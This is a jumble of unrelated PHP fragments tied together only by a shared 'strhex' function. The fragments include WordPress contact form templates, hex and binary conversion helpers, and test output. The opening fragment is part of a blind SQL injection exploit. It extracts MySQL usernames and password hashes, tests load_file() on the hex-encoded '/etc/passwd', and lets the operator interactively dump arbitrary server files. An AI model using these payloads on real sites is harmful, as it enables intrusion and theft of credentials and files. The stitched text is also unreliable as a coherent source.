$msg = "\n(+) MySQL user:pass -> "; $sqli = "'+and+ascii(substring((sElEcT+cOncAt("; $sqli .= "user,0x3a,password)+from+mysql.user+"; getlogindetails($p, $msg, $sqli); $loadsqli = "'+and+!isnull(loAd_fIle(0x2F6574632F706173737764))--+"; if (checksqli($loadsqli, $p)) { echo "\n(!) Access to load_file(), wanna play? (y/n): "; $resp = trim(read()); if (strcmp($resp, "y") === 0) { $loadfile = ""; while (strcmp($loadfile, "q") != 0) { echo "\n(+) Please enter the file (q to quit): "; $loadfile = trim(read()); if (strcmp($loadfile, "q") === 0) { break; } $loadsqli = "'+and+!isnull(loAd_fIle(0x" . strhex($loadfile) . "))--+"; if (checksqli($loadsqli, $p)) { $sqli = "'+and+ascii(substring(load_file(0x" . strhex($loadfile); $msg = "(!) Dumping the " . $loadfile . " file, hold onto your knickers!\n"; getlogindetails($p, $msg, $sqli); } else { echo "(-) File doesn't exist/no access."; } } } else { echo "(-) Ok Exiting..\n"; die; } } }
<p id="badserver" class="errormsg" style="display:none;">Your email failed. Try again later.</p> <form id="contact" action="<?php bloginfo('template_url'); ?> /sendmail.php" method="post"> <label for="name">Your name: *</label> <input type="text" id="nameinput" name="name" value=""/> <label for="email">Your email: *</label> <input type="text" id="emailinput" name="email" value=""/> <label for="comment">Your message: *</label> <textarea cols="20" rows="7" id="commentinput" name="comment"></textarea><br /> <input type="submit" id="submitinput" name="submit" class="submit" value="SEND MESSAGE"/> <input type="hidden" id="receiver" name="receiver" value="<?php echo strhex(get_option('boldy_contact_email')); ?> "/> </form> </div> <!-- end colleft --> <?php get_sidebar(); ?> <?php get_footer(); ?>
function init($string) { $len = strlen($string) * 8; $hex = strhex($string); // convert ascii string to hex $bin = leftpad(hexbin($hex), $len); // convert hex string to bin $padded = pad($bin); $padded = pad($padded, 1, $len); $block = str_split($padded, 32); foreach ($block as &$b) { $b = implode('', array_reverse(str_split($b, 8))); } return $block; }
function hexstr($hexstr) { $hexstr = str_replace(' ', '', $hexstr); $hexstr = str_replace('\\x', '', $hexstr); $retstr = pack('H*', $hexstr); return $retstr; } function strhex($string) { $hexstr = unpack('H*', $string); return array_shift($hexstr); } $teststr = "64 65 74 61 69 6c 73"; #$teststr = "01 02 63 00 39 00 45 00 36 00 43 00 32 00 30 00 41 00 30 00 00 00"; ini_set('display_errors', 1); error_reporting(E_ALL); $ascii_inputs = array("details", "abcde"); $hex_inputs = array("64 65 74 61 69 6c 73", "64657461696c73", '\\x64\\x65\\x74\\x61\\x69\\x6c\\x73'); print "<pre>"; foreach ($ascii_inputs as $str) { $str2 = strhex($str); //printf("strhex('%s') = %s [%s]\n", $str, var_export($str2, true), implode(" ", str_split($str2, 2))); echo $str2; } foreach ($hex_inputs as $str) { $str2 = hexstr($str); //printf("hexstr('%s') = %s\n", $str, var_export($str2, true)); } print "</pre><hr>\n"; //show_source(__FILE__);
$in = "1fv"; echo "strhex(", $in, ") = ", strhex($in), "<BR>"; $in = "1qf"; echo "strhex(", $in, ") = ", strhex($in), "<BR>"; $in = "1fq"; echo "strhex(", $in, ") = ", strhex($in), "<BR>"; $in = "qff"; echo "strhex(", $in, ") = ", strhex($in), "<BR>"; $in = ""; echo "strhex(", $in, ") = ", strhex($in), "<BR>"; $in = "FFFF"; echo "strhex(", $in, ") = ", strhex($in), "<BR>"; $in = "{$in}{$in}"; echo "strhex(", $in, ") = ", strhex($in), "<BR>"; $in = "{$in}{$in}"; echo "strhex(", $in, ") = ", strhex($in), "<BR>"; echo "<BR>"; /**********************************************************/ echo "*******************************<BR>"; echo "strbin(\$string) : <BR>"; echo "*******************************<BR>"; /**********************************************************/ $in = "10000000"; echo "strbin(", $in, ") = ", strbin($in), "<BR>"; $in = "100000v0"; echo "strbin(", $in, ") = ", strbin($in), "<BR>"; $in = "100000w0"; echo "strbin(", $in, ") = ", strbin($in), "<BR>"; $in = "100001w0"; echo "strbin(", $in, ") = ", strbin($in), "<BR>"; $in = "";
<p id="badserver" class="errormsg" style="display:none;">Your email failed. Try again later.</p> <form id="contact" action="<?php bloginfo('template_url'); ?> /sendmail.php" method="post"> <label for="nameinput">Your name: *</label> <input type="text" id="nameinput" name="name" value=""/> <label for="emailinput">Your email: *</label> <input type="text" id="emailinput" name="email" value=""/> <label for="commentinput">Your message: *</label> <textarea cols="20" rows="7" id="commentinput" name="comment"></textarea><br /> <input type="submit" id="submit" name="submit" class="submit" value="SEND MESSAGE"/> <input type="hidden" id="receiver" name="receiver" value="<?php echo strhex(get_option('diary_contact_email')); ?> "/> </form> </section> <div class="sidebadge"></div> </article> </section> <!-- End Main Content ( left col ) --> <?php get_sidebar(); get_footer(); ?>
_e('Your email failed. Try again later.', 'hm'); ?> </p> <form id="contact" action="<?php echo get_template_directory_uri(); ?> /inc/sendmail.php" method="post"> <label>Your name: *</label> <input type="text" id="nameinput" name="name" value=""/> <label>Your email: *</label> <input type="text" id="emailinput" name="email" value=""/> <label>Your message: *</label> <textarea cols="20" rows="7" id="commentinput" name="comment"></textarea> <input type="submit" id="send_message" name="submit" class="submit" value="SEND MESSAGE"/> <input type="hidden" id="receiver" name="receiver" value="<?php echo strhex(of_get_option('contact_form_email')); ?> "/> </form> </div> </div> <!--END .post_detail--> <?php } ?> <?php } ?> <script type="text/javascript">